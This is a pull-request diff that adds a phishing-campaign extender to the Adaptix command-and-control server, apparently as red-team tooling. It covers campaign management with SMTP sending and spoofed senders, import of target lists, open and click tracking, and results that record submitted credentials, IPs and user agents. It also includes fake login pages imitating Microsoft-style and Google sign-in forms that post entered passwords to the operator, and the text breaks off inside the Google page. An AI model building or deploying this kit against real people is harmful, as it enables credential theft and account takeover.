### PR TITLE
feat: add phishing service extender

### DIFF
--- a/AdaptixServer/extenders/phishing_service/Makefile
+++ b/AdaptixServer/extenders/phishing_service/Makefile
@@ -1,0 +1,10 @@
+all: clean
+	@ echo "    * Building phishing service plugin"
+	@ mkdir dist
+	@ cp config.yaml ax_config.axs ./dist/
+	@ cp -r templates landers ./dist/
+	@ GOEXPERIMENT=jsonv2,greenteagc go build -buildmode=plugin -ldflags="-s -w" -o ./dist/service_phishing.so *.go
+	@ echo "      done..."
+
+clean:
+	@ rm -rf dist

--- a/AdaptixServer/extenders/phishing_service/ax_config.axs
+++ b/AdaptixServer/extenders/phishing_service/ax_config.axs
@@ -1,0 +1,756 @@
+/// Phishing Service - UI
+
+let campaignsDock = null;
+let resultsDock = null;
+let campaignsTable = null;
+let resultsTable = null;
+let campaignFilter = null;
+let campaignsData = [];
+let allResults = {};
+let activePreview = null;
+
+// ============================================================================
+// InitService - Called when service is loaded
+// ============================================================================
+
+function InitService() {
+    createCampaignsDock();
+    createResultsDock();
+    loadInitialData();
+}
+
+// ============================================================================
+// Data Handler - Receives data from server
+// ============================================================================
+
+function data_handler(data) {
+    try {
+        let json = JSON.parse(data);
+        let msgType = json.type;
+
+        if (msgType === "campaigns") {
+            campaignsData = json.data || [];
+            refreshCampaignsTable();
+        }
+        else if (msgType === "targets") {
+            showTargetsDialog(json.data.campaign_id, json.data.targets || []);
+        }
+        else if (msgType === "results") {
+            let cid = json.data.campaign_id;
+            allResults[cid] = json.data.results || [];
+            refreshResultsTable();
+        }
+        else if (msgType === "event") {
+            handleEvent(json.event, json.data);
+        }
+        else if (msgType === "error") {
+            ax.show_message("Phishing Error", json.message);
+        }
+        else if (msgType === "templates") {
+            cachedTemplates = json.data || [];
+        }
+        else if (msgType === "landers") {
+            cachedLanders = json.data || [];
+        }
+        else if (msgType === "preview") {
+            if (activePreview) {
+                activePreview.setHtml(json.data.html);
+            }
+        }
+        else if (msgType === "export") {
+            let filename = "phishing_results_" + json.data.campaign_id + ".csv";
+            let path = ax.prompt_save_file(filename, "Export Results", "CSV Files (*.csv)");
+            if (path) {
+                ax.file_write_text(path, json.data.csv, false);
+            }
+        }
+    } catch (e) {
+        ax.log_error("Phishing: parse error: " + e);
+    }
+}
+
+// ============================================================================
+// Campaigns Dock
+// ============================================================================
+
+let cachedTemplates = [];
+let cachedLanders = [];
+
+function createCampaignsDock() {
+    campaignsDock = form.create_ext_dock("phishing_campaigns", "Phishing Campaigns", "");
+
+    let mainLayout = form.create_vlayout();
+
+    // Toolbar
+    let toolbar = form.create_hlayout();
+
+    let btnNew = form.create_button("New Campaign");
+    let btnStart = form.create_button("Start");
+    let btnStop = form.create_button("Stop");
+    let btnDelete = form.create_button("Delete");
+    let btnTargets = form.create_button("Targets");
+    let btnRefresh = form.create_button("Refresh");
+
+    toolbar.addWidget(btnNew);
+    toolbar.addWidget(btnStart);
+    toolbar.addWidget(btnStop);
+    toolbar.addWidget(btnTargets);
+    toolbar.addWidget(btnDelete);
+    toolbar.addWidget(form.create_hspacer());
+    toolbar.addWidget(btnRefresh);
+
+    let toolbarPanel = form.create_panel();
+    toolbarPanel.setLayout(toolbar);
+    mainLayout.addWidget(toolbarPanel);
+
+    // Table
+    campaignsTable = form.create_table(["Name", "Status", "Targets", "Sent", "Opened", "Clicked", "Submitted", "Errors", "Created By"]);
+    campaignsTable.setSortingEnabled(true);
+    campaignsTable.setReadOnly(true);
+    mainLayout.addWidget(campaignsTable);
+
+    campaignsDock.setLayout(mainLayout);
+    campaignsDock.setSize(900, 400);
+    campaignsDock.show();
+
+    // Signals
+    form.connect(btnNew, "clicked", function() {
+        ax.service_command("Phishing", "templates_list", {});
+        ax.service_command("Phishing", "landers_list", {});
+        // Small delay to let templates/landers load before showing dialog
+        event.on_timeout(function() { showNewCampaignDialog(); }, 1);
+    });
+
+    form.connect(btnStart, "clicked", function() {
+        let rows = campaignsTable.selectedRows();
+        if (rows.length === 0) return;
+        let cid = getCampaignIDByRow(rows[0]);
+        if (cid) {
+            if (ax.prompt_confirm("Start Campaign", "Send emails for this campaign?")) {
+                ax.service_command("Phishing", "campaign_start", {id: cid});
+            }
+        }
+    });
+
+    form.connect(btnStop, "clicked", function() {
+        let rows = campaignsTable.selectedRows();
+        if (rows.length === 0) return;
+        let cid = getCampaignIDByRow(rows[0]);
+        if (cid) {
+            ax.service_command("Phishing", "campaign_stop", {id: cid});
+        }
+    });
+
+    form.connect(btnDelete, "clicked", function() {
+        let rows = campaignsTable.selectedRows();
+        if (rows.length === 0) return;
+        let cid = getCampaignIDByRow(rows[0]);
+        if (cid) {
+            if (ax.prompt_confirm("Delete Campaign", "Delete this campaign and all its data?")) {
+                ax.service_command("Phishing", "campaign_delete", {id: cid});
+            }
+        }
+    });
+
+    form.connect(btnTargets, "clicked", function() {
+        let rows = campaignsTable.selectedRows();
+        if (rows.length === 0) return;
+        let cid = getCampaignIDByRow(rows[0]);
+        if (cid) {
+            ax.service_command("Phishing", "targets_list", {campaign_id: cid});
+        }
+    });
+
+    form.connect(btnRefresh, "clicked", function() {
+        loadInitialData();
+    });
+
+    form.connect(campaignsTable, "cellDoubleClicked", function(row, col) {
+        let cid = getCampaignIDByRow(row);
+        if (cid) {
+            ax.service_command("Phishing", "results_list", {campaign_id: cid});
+        }
+    });
+}
+
+function refreshCampaignsTable() {
+    if (!campaignsTable) return;
+
+    campaignsTable.setRowCount(0);
+    if (!campaignsData) return;
+
+    for (let i = 0; i < campaignsData.length; i++) {
+        let c = campaignsData[i];
+        let created = c.created_at ? ax.format_time("yyyy-MM-dd HH:mm", c.created_at) : "";
+        campaignsTable.addItem([
+            c.name || "",
+            c.status || "",
+            String(c.total_targets || 0),
+            String(c.sent || 0),
+            String(c.opened || 0),
+            String(c.clicked || 0),
+            String(c.submitted || 0),
+            String(c.errors || 0),
+            c.created_by || ""
+        ]);
+    }
+
+    // Update filter combo in results dock
+    updateCampaignFilter();
+}
+
+function getCampaignIDByRow(row) {
+    if (!campaignsData || row < 0 || row >= campaignsData.length) return null;
+    return campaignsData[row].id;
+}
+
+// ============================================================================
+// New Campaign Dialog
+// ============================================================================
+
+function showNewCampaignDialog() {
+    let dialog = form.create_dialog("New Phishing Campaign");
+    dialog.setSize(920, 700);
+
+    // ======================= Form fields =======================
+
+    let txtName = form.create_textline("");
+    txtName.setPlaceholder("Q1-2025 Password Audit - Finance Dept");
+    let txtSubject = form.create_textline("");
+    txtSubject.setPlaceholder("Action Required: Your password expires in 24 hours");
+    let txtSenderEmail = form.create_textline("");
+    txtSenderEmail.setPlaceholder("it-security@contoso.com");
+    let txtSenderName = form.create_textline("");
+    txtSenderName.setPlaceholder("IT Service Desk");
+
+    let txtSmtpHost = form.create_textline("");
+    txtSmtpHost.setPlaceholder("smtp.gmail.com");
+    let spinSmtpPort = form.create_spin();
+    spinSmtpPort.setRange(1, 65535);
+    spinSmtpPort.setValue(587);
+    let txtSmtpUser = form.create_textline("");
+    txtSmtpUser.setPlaceholder("relay@yourdomain.com");
+    let txtSmtpPass = form.create_textline("");
+    txtSmtpPass.setPlaceholder("App password or SMTP credential");
+    let chkSmtpTLS = form.create_check("Enable TLS");
+    chkSmtpTLS.setChecked(true);
+
+    let cmbTemplate = form.create_combo();
+    let cmbLander = form.create_combo();
+    if (cachedTemplates && cachedTemplates.length > 0) {
+        for (let i = 0; i < cachedTemplates.length; i++) cmbTemplate.addItem(cachedTemplates[i]);
+    }
+    if (cachedLanders && cachedLanders.length > 0) {
+        for (let i = 0; i < cachedLanders.length; i++) cmbLander.addItem(cachedLanders[i]);
+    }
+
+    let txtBaseURL = form.create_textline("");
+    txtBaseURL.setPlaceholder("https://portal-auth.contoso.com");
+    let txtRedirectURL = form.create_textline("https://login.microsoftonline.com");
+    let chkTrackOpens = form.create_check("Track email opens (1x1 tracking pixel)");
+    chkTrackOpens.setChecked(true);
+    let chkTrackClicks = form.create_check("Track link clicks (redirect through server)");
+    chkTrackClicks.setChecked(true);
+    let spinDelay = form.create_spin();
+    spinDelay.setRange(0, 300);
+    spinDelay.setValue(3);
+
+    // Preview browser
+    let previewBrowser = form.create_textbrowser();
+    activePreview = previewBrowser;
+
+    // ======================= Layout =======================
+
+    let pageLayout = form.create_vlayout();
+
+    // --- Campaign Identity ---
+    let identGrid = form.create_gridlayout();
+    identGrid.addWidget(form.create_label("Name *"), 0, 0);
+    identGrid.addWidget(txtName, 0, 1);
+    identGrid.addWidget(form.create_label("Subject *"), 1, 0);
+    identGrid.addWidget(txtSubject, 1, 1);
+
+    let identInner = form.create_panel();
+    identInner.setLayout(identGrid);
+    let grpIdent = form.create_groupbox("Campaign Identity", false);
+    grpIdent.setPanel(identInner);
+    pageLayout.addWidget(grpIdent);
+
+    // --- Sender ---
+    let senderGrid = form.create_gridlayout();
+    senderGrid.addWidget(form.create_label("Email *"), 0, 0);
+    senderGrid.addWidget(txtSenderEmail, 0, 1);
+    senderGrid.addWidget(form.create_label("Display Name"), 1, 0);
+    senderGrid.addWidget(txtSenderName, 1, 1);
+
+    let senderInner = form.create_panel();
+    senderInner.setLayout(senderGrid);
+    let grpSender = form.create_groupbox("Sender (From)", false);
+    grpSender.setPanel(senderInner);
+    pageLayout.addWidget(grpSender);
+
+    // --- SMTP Server ---
+    let smtpGrid = form.create_gridlayout();
+    smtpGrid.addWidget(form.create_label("Host *"), 0, 0);
+    smtpGrid.addWidget(txtSmtpHost, 0, 1);
+    smtpGrid.addWidget(form.create_label("Port"), 1, 0);
+    let portRow = form.create_hlayout();
+    portRow.addWidget(spinSmtpPort);
+    portRow.addWidget(form.create_label("  587=STARTTLS  465=SMTPS  25=Plain"));
+    let portPanel = form.create_panel();
+    portPanel.setLayout(portRow);
+    smtpGrid.addWidget(portPanel, 1, 1);
+    smtpGrid.addWidget(form.create_label("Username"), 2, 0);
+    smtpGrid.addWidget(txtSmtpUser, 2, 1);
+    smtpGrid.addWidget(form.create_label("Password"), 3, 0);
+    smtpGrid.addWidget(txtSmtpPass, 3, 1);
+    smtpGrid.addWidget(chkSmtpTLS, 4, 1);
+
+    let smtpInner = form.create_panel();
+    smtpInner.setLayout(smtpGrid);
+    let grpSmtp = form.create_groupbox("SMTP Server", false);
+    grpSmtp.setPanel(smtpInner);
+    pageLayout.addWidget(grpSmtp);
+
+    // --- Content & Preview (splitter) ---
+    let contentGrid = form.create_gridlayout();
+    contentGrid.addWidget(form.create_label("Email Template"), 0, 0);
+    contentGrid.addWidget(cmbTemplate, 0, 1);
+    contentGrid.addWidget(form.create_label("Landing Page"), 1, 0);
+    contentGrid.addWidget(cmbLander, 1, 1);
+
+    // Template descriptions table
+    let tplDesc = form.create_table(["Template", "Scenario", "Best paired with"]);
+    tplDesc.setReadOnly(true);
+    tplDesc.setSortingEnabled(false);
+    tplDesc.setHeadersVisible(true);
+    tplDesc.addItem(["password_expiry",        "Password expiration alert",       "microsoft_login"]);
+    tplDesc.addItem(["shared_document",        "SharePoint file share",           "microsoft_login"]);
+    tplDesc.addItem(["voicemail_notification",  "Teams voicemail received",        "microsoft_login"]);
+    tplDesc.addItem(["helpdesk_ticket",        "IT support ticket opened",        "okta_login"]);
+    tplDesc.addItem(["mfa_setup",              "MFA enrollment required",         "okta_login"]);
+    tplDesc.addItem(["default_email",          "Generic document review",         "default_login"]);
+
+    // Left side: combos + reference table
+    let leftLayout = form.create_vlayout();
+    let contentGridPanel = form.create_panel();
+    contentGridPanel.setLayout(contentGrid);
+    leftLayout.addWidget(contentGridPanel);
+    leftLayout.addWidget(tplDesc);
+
+    let leftPanel = form.create_panel();
+    leftPanel.setLayout(leftLayout);
+
+    // Right side: HTML preview
+    let rightLayout = form.create_vlayout();
+    rightLayout.addWidget(form.create_label("Preview"));
+    rightLayout.addWidget(previewBrowser);
+
+    let rightPanel = form.create_panel();
+    rightPanel.setLayout(rightLayout);
+
+    // Splitter: left controls | right preview
+    let contentSplitter = form.create_hsplitter();
+    contentSplitter.addPage(leftPanel);
+    contentSplitter.addPage(rightPanel);
+    contentSplitter.setSizes([320, 540]);
+
+    let contentSplitLayout = form.create_vlayout();
+    contentSplitLayout.addWidget(contentSplitter);
+
+    let contentInner = form.create_panel();
+    contentInner.setLayout(contentSplitLayout);
+    let grpContent = form.create_groupbox("Content & Preview", false);
+    grpContent.setPanel(contentInner);
+    pageLayout.addWidget(grpContent);
+
+    // Connect combos to preview
+    form.connect(cmbTemplate, "currentTextChanged", function(text) {
+        if (text) ax.service_command("Phishing", "template_preview", {type: "template", name: text});
+    });
+    form.connect(cmbLander, "currentTextChanged", function(text) {
+        if (text) ax.service_command("Phishing", "template_preview", {type: "lander", name: text});
+    });
+
+    // Load initial preview for the first selected template
+    if (cmbTemplate.currentText()) {
+        ax.service_command("Phishing", "template_preview", {type: "template", name: cmbTemplate.currentText()});
+    }
+
+    // --- Tracking & Delivery ---
+    let trackGrid = form.create_gridlayout();
+    trackGrid.addWidget(form.create_label("Base URL *"), 0, 0);
+    trackGrid.addWidget(txtBaseURL, 0, 1);
+    trackGrid.addWidget(form.create_label("Redirect URL"), 1, 0);
+    trackGrid.addWidget(txtRedirectURL, 1, 1);
+    trackGrid.addWidget(chkTrackOpens, 2, 1);
+    trackGrid.addWidget(chkTrackClicks, 3, 1);
+    trackGrid.addWidget(form.create_label("Send Delay (s)"), 4, 0);
+    let delayRow = form.create_hlayout();
+    delayRow.addWidget(spinDelay);
+    delayRow.addWidget(form.create_label("  Seconds between each email sent"));
+    let delayPanel = form.create_panel();
+    delayPanel.setLayout(delayRow);
+    trackGrid.addWidget(delayPanel, 4, 1);
+
+    let trackInner = form.create_panel();
+    trackInner.setLayout(trackGrid);
+    let grpTrack = form.create_groupbox("Tracking & Delivery", false);
+    grpTrack.setPanel(trackInner);
+    pageLayout.addWidget(grpTrack);
+
+    // --- Spacer at bottom ---
+    pageLayout.addWidget(form.create_vspacer());
+
+    // --- Scrollable container ---
+    let scrollContent = form.create_panel();
+    scrollContent.setLayout(pageLayout);
+    let scrollArea = form.create_scrollarea();
+    scrollArea.setPanel(scrollContent);
+    scrollArea.setWidgetResizable(true);
+
+    let mainLayout = form.create_vlayout();
+    mainLayout.addWidget(scrollArea);
+    dialog.setLayout(mainLayout);
+
+    let accepted = dialog.exec();
+    activePreview = null;
+
+    if (accepted === true) {
+        let campaign = {
+            name:         txtName.text(),
+            subject:      txtSubject.text(),
+            sender_email: txtSenderEmail.text(),
+            sender_name:  txtSenderName.text(),
+            smtp_host:    txtSmtpHost.text(),
+            smtp_port:    spinSmtpPort.value(),
+            smtp_user:    txtSmtpUser.text(),
+            smtp_pass:    txtSmtpPass.text(),
+            smtp_tls:     chkSmtpTLS.isChecked(),
+            template:     cmbTemplate.currentText(),
+            lander:       cmbLander.currentText(),
+            base_url:     txtBaseURL.text(),
+            redirect_url: txtRedirectURL.text(),
+            track_opens:  chkTrackOpens.isChecked(),
+            track_clicks: chkTrackClicks.isChecked(),
+            send_delay:   spinDelay.value()
+        };
+
+        if (!campaign.name || !campaign.smtp_host || !campaign.sender_email || !campaign.base_url) {
+            ax.show_message("Error", "Required fields: Campaign Name, SMTP Host, Sender Email, Base URL");
+            return;
+        }
+
+        ax.service_command("Phishing", "campaign_create", campaign);
+    }
+}
+
+// ============================================================================
+// Targets Dialog
+// ============================================================================
+
+function showTargetsDialog(campaignID, targets) {
+    let dialog = form.create_ext_dialog("Targets - Campaign");
+    dialog.setSize(700, 500);
+
+    let mainLayout = form.create_vlayout();
+
+    // Toolbar
+    let toolbar = form.create_hlayout();
+    let btnImport = form.create_button("Import CSV");
+    let btnDelete = form.create_button("Delete Selected");
+    toolbar.addWidget(btnImport);
+    toolbar.addWidget(btnDelete);
+    toolbar.addWidget(form.create_hspacer());
+
+    let tgtToolbarPanel = form.create_panel();
+    tgtToolbarPanel.setLayout(toolbar);
+    mainLayout.addWidget(tgtToolbarPanel);
+
+    // Table
+    let tgtTable = form.create_table(["Email", "First Name", "Last Name", "Position", "Company"]);
+    tgtTable.setSortingEnabled(true);
+    tgtTable.setReadOnly(true);
+
+    if (targets) {
+        for (let i = 0; i < targets.length; i++) {
+            let t = targets[i];
+            tgtTable.addItem([t.email, t.first_name, t.last_name, t.position, t.company]);
+        }
+    }
+    mainLayout.addWidget(tgtTable);
+
+    dialog.setLayout(mainLayout);
+
+    form.connect(btnImport, "clicked", function() {
+        let csvDialog = form.create_dialog("Import Targets (CSV)");
+        csvDialog.setSize(560, 450);
+
+        let csvLayout = form.create_vlayout();
+        csvLayout.addWidget(form.create_label("Paste CSV data or load a file. Columns: email, first_name, last_name, position, company"));
+        csvLayout.addWidget(form.create_label("The first row must be column headers. Only 'email' is required."));
+        let csvText = form.create_textmulti("email,first_name,last_name,position,company\njohn.doe@contoso.com,John,Doe,CFO,Contoso Ltd\njane.smith@contoso.com,Jane,Smith,IT Manager,Contoso Ltd\n");
+        csvLayout.addWidget(csvText);
+
+        let orLabel = form.create_label("Or load from file:");
+        csvLayout.addWidget(orLabel);
+
+        let btnFile = form.create_button("Load CSV File");
+        csvLayout.addWidget(btnFile);
+
+        form.connect(btnFile, "clicked", function() {
+            let path = ax.prompt_open_file("Select CSV file", "CSV Files (*.csv);;All Files (*)");
+            if (path) {
+                let content = ax.file_read(path);
+                if (content) {
+                    csvText.setText(content);
+                }
+            }
+        });
+
+        csvDialog.setLayout(csvLayout);
+        if (csvDialog.exec() === true) {
+            let csv = csvText.text();
+            if (csv && csv.trim().length > 0) {
+                ax.service_command("Phishing", "targets_import", {
+                    campaign_id: campaignID,
+                    csv: csv
+                });
+            }
+        }
+    });
+
+    form.connect(btnDelete, "clicked", function() {
+        let rows = tgtTable.selectedRows();
+        if (rows.length === 0) return;
+
+        let ids = [];
+        for (let i = 0; i < rows.length; i++) {
+            if (targets && rows[i] < targets.length) {
+                ids.push(targets[rows[i]].id);
+            }
+        }
+
+        if (ids.length > 0 && ax.prompt_confirm("Delete Targets", "Delete " + ids.length + " selected target(s)?")) {
+            ax.service_command("Phishing", "targets_delete", {
+                campaign_id: campaignID,
+                ids: ids
+            });
+        }
+    });
+
+    dialog.show();
+}
+
+// ============================================================================
+// Results Dock
+// ============================================================================
+
+function createResultsDock() {
+    resultsDock = form.create_ext_dock("phishing_results", "Phishing Results", "");
+
+    let mainLayout = form.create_vlayout();
+
+    // Filter bar
+    let filterLayout = form.create_hlayout();
+    filterLayout.addWidget(form.create_label("Campaign:"));
+    campaignFilter = form.create_combo();
+    campaignFilter.addItem("-- All --");
+    filterLayout.addWidget(campaignFilter);
+
+    let btnExport = form.create_button("Export CSV");
+    let btnRefresh = form.create_button("Refresh");
+    filterLayout.addWidget(form.create_hspacer());
+    filterLayout.addWidget(btnExport);
+    filterLayout.addWidget(btnRefresh);
+
+    let filterPanel = form.create_panel();
+    filterPanel.setLayout(filterLayout);
+    mainLayout.addWidget(filterPanel);
+
+    // Table
+    resultsTable = form.create_table(["Campaign", "Email", "Name", "Status", "Sent", "Opened", "Clicked", "Submitted", "IP", "User Agent"]);
+    resultsTable.setSortingEnabled(true);
+    resultsTable.setReadOnly(true);
+    mainLayout.addWidget(resultsTable);
+
+    resultsDock.setLayout(mainLayout);
+    resultsDock.setSize(1000, 400);
+    resultsDock.show();
+
+    // Signals
+    form.connect(campaignFilter, "currentTextChanged", function(text) {
+        refreshResultsTable();
+    });
+
+    form.connect(btnExport, "clicked", function() {
+        let cid = getSelectedCampaignID();
+        if (cid) {
+            ax.service_command("Phishing", "results_export", {campaign_id: cid});
+        } else {
+            ax.show_message("Export", "Please select a specific campaign to export");
+        }
+    });
+
+    form.connect(btnRefresh, "clicked", function() {
+        loadAllResults();
+    });
+
+    form.connect(resultsTable, "cellDoubleClicked", function(row, col) {
+        showResultDetail(row);
+    });
+}
+
+function updateCampaignFilter() {
+    if (!campaignFilter) return;
+
+    let current = campaignFilter.currentText();
+    campaignFilter.clear();
+    campaignFilter.addItem("-- All --");
+
+    if (campaignsData) {
+        for (let i = 0; i < campaignsData.length; i++) {
+            campaignFilter.addItem(campaignsData[i].name);
+        }
+    }
+
+    // Restore selection
+    for (let i = 0; i < campaignFilter.count; i++) {
+        if (campaignFilter.itemText && campaignFilter.itemText(i) === current) {
+            campaignFilter.setCurrentIndex(i);
+            return;
+        }
+    }
+}
+
+function getSelectedCampaignID() {
+    if (!campaignFilter) return null;
+    let text = campaignFilter.currentText();
+    if (text === "-- All --") return null;
+
+    if (campaignsData) {
+        for (let i = 0; i < campaignsData.length; i++) {
+            if (campaignsData[i].name === text) {
+                return campaignsData[i].id;
+            }
+        }
+    }
+    return null;
+}
+
+function refreshResultsTable() {
+    if (!resultsTable) return;
+    resultsTable.setRowCount(0);
+
+    let filterCampaign = getSelectedCampaignID();
+
+    for (let cid in allResults) {
+        if (filterCampaign && cid !== filterCampaign) continue;
+
+        let campaignName = getCampaignNameByID(cid);
+        let results = allResults[cid];
+        if (!results) continue;
+
+        for (let i = 0; i < results.length; i++) {
+            let r = results[i];
+            let name = (r.first_name || "") + " " + (r.last_name || "");
+            let sentAt = r.sent_at ? ax.format_time("HH:mm:ss", r.sent_at) : "";
+            let openedAt = r.opened_at ? ax.format_time("HH:mm:ss", r.opened_at) : "";
+            let clickedAt = r.clicked_at ? ax.format_time("HH:mm:ss", r.clicked_at) : "";
+            let submitAt = r.submit_at ? ax.format_time("HH:mm:ss", r.submit_at) : "";
+
+            resultsTable.addItem([
+                campaignName,
+                r.email || "",
+                name.trim(),
+                r.status || "",
+                sentAt,
+                openedAt,
+                clickedAt,
+                submitAt,
+                r.remote_ip || "",
+                r.user_agent || ""
+            ]);
+        }
+    }
+}
+
+function getCampaignNameByID(id) {
+    if (campaignsData) {
+        for (let i = 0; i < campaignsData.length; i++) {
+            if (campaignsData[i].id === id) return campaignsData[i].name;
+        }
+    }
+    return id;
+}
+
+function showResultDetail(row) {
+    // Collect result data from the table row for display
+    let campaign = resultsTable.text(row, 0);
+    let email = resultsTable.text(row, 1);
+    let name = resultsTable.text(row, 2);
+    let status = resultsTable.text(row, 3);
+    let ip = resultsTable.text(row, 8);
+    let ua = resultsTable.text(row, 9);
+
+    let detail = "Campaign: " + campaign + "\n" +
+                 "Email: " + email + "\n" +
+                 "Name: " + name + "\n" +
+                 "Status: " + status + "\n" +
+                 "IP: " + ip + "\n" +
+                 "User Agent: " + ua;
+
+    ax.show_message("Result Detail", detail);
+}
+
+// ============================================================================
+// Event Handling
+// ============================================================================
+
+function handleEvent(eventType, data) {
+    if (!data || !data.campaign_id) return;
+
+    let cid = data.campaign_id;
+    let result = data.result;
+
+    // Update local results cache
+    if (result && allResults[cid]) {
+        let found = false;
+        for (let i = 0; i < allResults[cid].length; i++) {
+            if (allResults[cid][i].id === result.id) {
+                allResults[cid][i] = result;
+                found = true;
+                break;
+            }
+        }
+        if (!found) {
+            allResults[cid].push(result);
+        }
+    } else if (result && !allResults[cid]) {
+        allResults[cid] = [result];
+    }
+
+    refreshResultsTable();
+
+    // Also refresh campaign stats
+    ax.service_command("Phishing", "campaign_list", {});
+}
+
+// ============================================================================
+// Data Loading
+// ============================================================================
+
+function loadInitialData() {
+    ax.service_command("Phishing", "campaign_list", {});
+    ax.service_command("Phishing", "templates_list", {});
+    ax.service_command("Phishing", "landers_list", {});
+    loadAllResults();
+}
+
+function loadAllResults() {
+    if (campaignsData) {
+        for (let i = 0; i < campaignsData.length; i++) {
+            ax.service_command("Phishing", "results_list", {campaign_id: campaignsData[i].id});
+        }
+    }
+}

--- a/AdaptixServer/extenders/phishing_service/config.yaml
+++ b/AdaptixServer/extenders/phishing_service/config.yaml
@@ -1,0 +1,5 @@
+extender_type: "service"
+extender_file: "service_phishing.so"
+ax_file: "ax_config.axs"
+service_name: "Phishing"
+service_config: ""

--- a/AdaptixServer/extenders/phishing_service/go.mod
+++ b/AdaptixServer/extenders/phishing_service/go.mod
@@ -1,0 +1,5 @@
+module adaptix_service_phishing
+
+go 1.25.4
+
+require github.com/Adaptix-Framework/axc2 v1.2.0

--- a/AdaptixServer/extenders/phishing_service/go.sum
+++ b/AdaptixServer/extenders/phishing_service/go.sum
@@ -1,0 +1,2 @@
+github.com/Adaptix-Framework/axc2 v1.2.0 h1:WYEg502NTTtX1tQJUz2AaC2dmm/bS/1L1iOHOQ5kEYA=
+github.com/Adaptix-Framework/axc2 v1.2.0/go.mod h1:3oJyFeRVIql1RTsNa0meEqK3+P+6JTAMMjMdVyXhbaQ=

--- a/AdaptixServer/extenders/phishing_service/landers/default_login.html
+++ b/AdaptixServer/extenders/phishing_service/landers/default_login.html
@@ -1,0 +1,116 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Sign In</title>
+<style>
+* { margin: 0; padding: 0; box-sizing: border-box; }
+body {
+    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
+    background-color: #f2f2f2;
+    display: flex;
+    justify-content: center;
+    align-items: center;
+    min-height: 100vh;
+}
+.login-container {
+    background: #ffffff;
+    padding: 44px;
+    width: 440px;
+    box-shadow: 0 2px 6px rgba(0,0,0,0.2);
+}
+.logo {
+    font-size: 20px;
+    font-weight: 600;
+    color: #1b1b1b;
+    margin-bottom: 16px;
+}
+.logo span {
+    color: #0078d4;
+}
+h2 {
+    font-size: 24px;
+    font-weight: 300;
+    color: #1b1b1b;
+    margin-bottom: 24px;
+}
+.email-display {
+    font-size: 14px;
+    color: #666;
+    margin-bottom: 20px;
+    padding: 8px 0;
+}
+.form-group {
+    margin-bottom: 16px;
+}
+label {
+    display: block;
+    font-size: 13px;
+    color: #1b1b1b;
+    margin-bottom: 4px;
+}
+input[type="email"],
+input[type="password"],
+input[type="text"] {
+    width: 100%;
+    padding: 6px 10px;
+    font-size: 15px;
+    border: 1px solid #666;
+    outline: none;
+    font-family: inherit;
+}
+input:focus {
+    border-color: #0078d4;
+}
+.submit-btn {
+    width: 100%;
+    padding: 10px;
+    background-color: #0078d4;
+    color: #ffffff;
+    border: none;
+    font-size: 15px;
+    font-weight: 600;
+    cursor: pointer;
+    margin-top: 16px;
+}
+.submit-btn:hover {
+    background-color: #106ebe;
+}
+.footer-links {
+    margin-top: 16px;
+    font-size: 13px;
+}
+.footer-links a {
+    color: #0067b8;
+    text-decoration: none;
+}
+.footer-links a:hover {
+    text-decoration: underline;
+}
+</style>
+</head>
+<body>
+<div class="login-container">
+    <div class="logo">Sign in</div>
+
+    <div class="email-display">{{.Email}}</div>
+
+    <form method="POST" action="{{.SubmitURL}}">
+        <input type="hidden" name="email" value="{{.Email}}">
+
+        <div class="form-group">
+            <label for="password">Password</label>
+            <input type="password" id="password" name="password" placeholder="Password" required autofocus>
+        </div>
+
+        <button type="submit" class="submit-btn">Sign in</button>
+    </form>
+
+    <div class="footer-links">
+        <a href="#">Forgot my password</a><br>
+        <a href="#">Sign in with a security key</a>
+    </div>
+</div>
+</body>
+</html>

--- a/AdaptixServer/extenders/phishing_service/landers/google_login.html
+++ b/AdaptixServer/extenders/phishing_service/landers/google_login.html
@@ -1,0 +1,73 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Sign in - Google Accounts</title>
+<style>
+*{margin:0;padding:0;box-sizing:border-box}
+body{font-family:'Google Sans',Roboto,Arial,sans-serif;background-color:#fff;display:flex;justify-content:center;align-items:center;min-height:100vh}
+.container{width:450px;padding:48px 40px 36px;border:1px solid #dadce0;border-radius:8px}
+.google-logo{text-align:center;margin-bottom:16px}
+.google-logo span{font-size:24px;font-weight:500}
+.google-logo .g-blue{color:#4285f4}.google-logo .g-red{color:#ea4335}.google-logo .g-yellow{color:#fbbc05}.google-logo .g-green{color:#34a853}
+h1{text-align:center;font-size:24px;font-weight:400;color:#202124;margin-bottom:8px}
+.subtitle{text-align:center;font-size:16px;color:#202124;margin-bottom:32px}
+.email-chip{display:flex;align-items:center;justify-content:center;margin-bottom:24px}
+.email-chip span{display:inline-flex;align-items:center;padding:4px 12px;border:1px solid #dadce0;border-radius:16px;font-size:14px;color:#3c4043}
+.email-chip span::before{content:"";display:inline-block;width:20px;height:20px;background:#5f6368;border-radius:50%;margin-right:8px}
+.form-group{margin-bottom:24px;position:relative}
+input[type="password"]{width:100%;padding:13px 15px;font-size:16px;border:1px solid #dadce0;border-radius:4px;outline:none;font-family:inherit}
+input:focus{border:2px solid #1a73e8;padding:12px 14px}
+label.float-label{position:absolute;left:15px;top:14px;color:#5f6368;font-size:16px;transition:all 0.2s;pointer-events:none}
+input:focus+label.float-label,input:not(:placeholder-shown)+label.float-label{top:-8px;left:12px;font-size:12px;color:#1a73e8;background:#fff;padding:0 4px}
+.links{margin-bottom:32px}
+.links a{color:#1a73e8;text-decoration:none;font-size:14px;font-weight:500}
+.links a:hover{text-decoration:underline}
+.actions{display:flex;justify-content:space-between;align-items:center}
+.actions a{color:#1a73e8;text-decoration:none;font-size:14px;font-weight:500}
+.actions a:hover{text-decoration:underline}
+.submit-btn{padding:8px 24px;background-color:#1a73e8;color:#fff;border:none;font-size:14px;font-weight:500;border-radius:4px;cursor:pointer;font-family:inherit;letter-spacing:0.25px;min-width:80px;height:36px}
+.submit-btn:hover{background-color:#1765cc;box-shadow:0 1px 2px rgba(0,0,0,0.3)}
+.footer{text-align:center;margin-top:32px;font-size:12px;color:#5f6368}
+.footer a{color:#5f6368;margin:0 8px}
+</style>
+</head>
+<body>
+<div class="container">
+<div class="google-logo">
+<span class="g-blue">G</span><span class="g-red">o</span><span class="g-yellow">o</span><span class="g-blue">g</span><span class="g-green">l</span><span class="g-red">e</span>
+</div>
+
+<h1>Welcome</h1>
+<div class="subtitle">
+
